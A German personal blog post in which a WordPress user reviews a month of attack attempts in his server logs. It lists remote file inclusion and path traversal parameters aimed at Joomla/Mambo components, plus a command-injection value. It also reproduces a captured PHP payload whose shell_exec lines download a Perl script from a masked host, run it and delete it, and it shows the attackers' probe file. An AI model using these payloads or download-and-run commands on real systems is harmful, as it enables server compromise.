Über den Author / Internet / Ich nutze WordPress nicht Joomla

Ich nutze WordPress nicht Joomla

~3 Min. Lesezeit

Wie der Titel es schon sagt, ich benutze WordPress und nicht Joomla. Vermutlich müsste ich dies auf Englisch schreiben, damit es auch die hinterletzten „Personen“ lesen und verstehen können.

Aber nun dämmert es mir, das sind ja Scripte und die können nicht lesen.

Das Joomla eines der unsichersten CMS Systemen ist, habe ich schon Sicherheit von Open CMS Systemen (Joomla Bugs), wo ich die veröffentlichten Bugs von 10 Tagen präsentierte.

27 Sicherheitslücken war das Resümee. Leider waren dies keine speziellen 10 Tage, sondern Tagesgeschäft bei Joomla.

Immer wieder fällt mir auf, wie versucht wird mein netter Blog anzugreifen. In dem Log bleiben selbstverständlich die Spuren zurück, wie:

/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path=http://*****/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??

Einfach mal aus Lust und Laune schaute ich den letzten Monat an und machte eine Liste wobei pro Angreifer nur 1 Zeile aufgenommen wurde.

configdir=%7Cecho%20%22Osirys-p0wa%22;%20id%7C
libpath=http://****/idbrac.txt???
_PHPLIB[libdir]=http://****/README.txt??
board_skin_path=http://****g/images/log.png???
thisdir=http://****/steelbahamas/id1.txt??
_SERVER[DOCUMENT_ROOT]=http://****/forum/Smileys/id1.txt??
include_path=http://****/upfiles/README.txt?
forumspath=http://****/A51/id.txt????
name=../../../../../../../../../../../../../proc/self/environ%00
myPath=http://****/content/id.txt??
cm_ext_server=http://****//news//inc/id1.txt???
r=http://****/list/respon1.txt?
_SERVER[DOCUMENT_ROOT]=http://****//shop/data/log/id.txt??
r=http://****//1.txt???
c=../../../../../../../../../../../../../etc/passwd%00
myPath=http://****/media/id.txt???
fs_javascript=http://****//administrator/components/com_virtuemart/sql/Oid1.txt???
basePath=http://****/images/r8_c11.gif???
show=../../../../../../../../../../../../../proc/self/environ%00
board_skin_path=http://****/test.txt??
wpPATH=http://****/list/id1.txt??
path_to_root=http://****/fx29id1.txt?????
mosConfig_absolute_path=http://****/extend/respon1.txt??
mosConfig.absolute.path=http://****//email-images/images/test.txt????
mosConfig_absolute_path=http://****/bbs//skin/zero_vote/fx29id1.txt????
mosConfig_absolute_path=http://****/zfxid1.txt???
mosConfig_absolute_path=http://****/lct/exam3/111/id1.txt???
mosConfig_absolute_path=http://****/idf.txt??
mosConfig_absolute_path=http://****/fx29id1.txt?
mosConfig_absolute_path=http://****/bbs//data/1.txt????
mosConfig_absolute_path=http://****/thumbnails/id1.txt?
mosConfig_absolute_path=http://****/bbs/README.txt?
q=http://****/language/byz9991.txt???
wpPATH=http://****/info.txt???

In den Files (z.B. http://****g/images/log.png) sind dann Dinge wie:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                          
shell_exec('cd /tmp; wget http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;curl -O http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;lwp-download http://****/awerac/b.txt;perl b.txt;rm -rf b.txtt*');
shell_exec('cd /tmp;lynx -source http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;fetch http://****/awerac/b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;GET http://****/awerac/b.txt>b.txt;perl b.txt;rm -rf b.txt*');
shell_exec('cd /tmp;rm -rf b.txt*');
/* Das Ganze oben wiederholt sich dann mit verschiedenen Systembefehlen */

echo "DEPP NAMEN<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

In den TXT files ist meist sowas drin:

<?php /* ZFxID */ echo("Depp"."Name"); echo("Depp"."Name");  /* ZFxID */ ?>

Dies wird nur gemacht, um zu prüfen ob diese Werte ausgegeben werden, wenn Ja, dann ist der Code angreifbar und dann kommt man mit dem richtigen Exploit, wie im oberen Beispiel.

Naja, Kiddies ein kleiner Tipp, verwendet eine neue Sicherheitslücke, denn die wo ihr nutzt, ist schon ein wenig älter und schon fast überall behoben.

Die infizierten Webseiten (wo noch online sind) habe ich informiert.
Kontrolliert ich auch gelegentlich ob ihr angegriffen werdet? Wie oft passiert dies bei Euch?

About Stefan

avatar
Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf.Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

PHP Trojaner (Teil 2: Uploader Infektion)

~1 Min. LesezeitPHP Trojaner sind beliebt, denn oft werden solche Infektionen übersehen und überstehen Jahre …

PHP Trojaner (Teil 1: footer.php Infektion)

~1 Min. LesezeitWieder einmal hat das anynome Web zugeschlagen und eine Installation von diversen WordPress …

Ein Kommentar

  1. avatar

    *kicher* als ich mal ne Weile meine 404 Seiten näher angesehen habe, kam mir auch als erstes die Frage, für welche Systeme die mich alles halten. Ein Shopsystem war übrigens auch dabei 😉
    .-= Tanja´s last blog ..Volksnotebook 2010 – Dell Inspiron 15 für 449 Euro – Im Vergleich mit Acer Extensa 5635z und ASUS X5DIJ-SX247V =-.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.

This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg